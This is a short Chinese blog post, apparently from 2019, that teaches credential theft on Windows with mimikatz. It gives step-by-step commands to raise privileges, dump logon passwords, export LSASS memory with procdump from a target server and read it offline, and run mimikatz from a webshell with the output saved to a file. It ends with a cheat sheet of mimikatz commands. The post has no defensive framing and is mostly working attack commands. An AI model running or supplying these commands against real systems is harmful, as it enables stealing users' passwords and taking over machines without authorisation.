mimikatz读取用户密码

2019-05-23  本文已影响0人  migrate_
  1. 提升权限
privilege::debug
1.jpg
  1. 抓取密码
sekurlsa::logonPasswords
2.jpg
  1. 当无法上传mimikatz工具到目标服务器时,可以利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码
procdump64.exe -accepteula -ma lsass.exe lsass.dmp 导出为lsass.dump文件
把lsass.dmp放在mimikatz目录利用
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
  1. 如果在webshell下运行没有交互界面可以试试这种方法
直接执行mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"  "exit"> password.txt    #之前试过不加exit,会无限重定向到password.txt,加exit后会自动退出
会在目录下生成password.txt文件
3.png
  1. 命令大全

    cls-----------------------------清屏
    exit----------------------------退出
    version------------查看mimikatz的版本
    system::user-----查看当前登录的系统用户
    system::computer-------查看计算机名称
    process::list------------------列出进程
    process::suspend 进程名称 -----暂停进程
    process::stop 进程名称---------结束进程
    process::modules --列出系统的核心模块及所在位置
    service::list---------------列出系统的服务
    service::remove-----------移除系统的服务
    service::start stop 服务名称--启动或停止服务
    privilege::list---------------列出权限列表
    privilege::enable--------激活一个或多个权限
    privilege::debug-----------------提升权限
    nogpo::cmd------------打开系统的cmd.exe
    nogpo::regedit -----------打开系统的注册表
    nogpo::taskmgr-------------打开任务管理器
    ts::sessions-----------------显示当前的会话
    ts::processes------显示进程和对应的pid情况等
    sekurlsa::wdigest-----获取本地用户信息及密码
    sekurlsa::tspkg------获取tspkg用户信息及密码
    sekurlsa::logonPasswords--获登陆用户信息及密码

上一篇 下一篇

猜你喜欢

热点阅读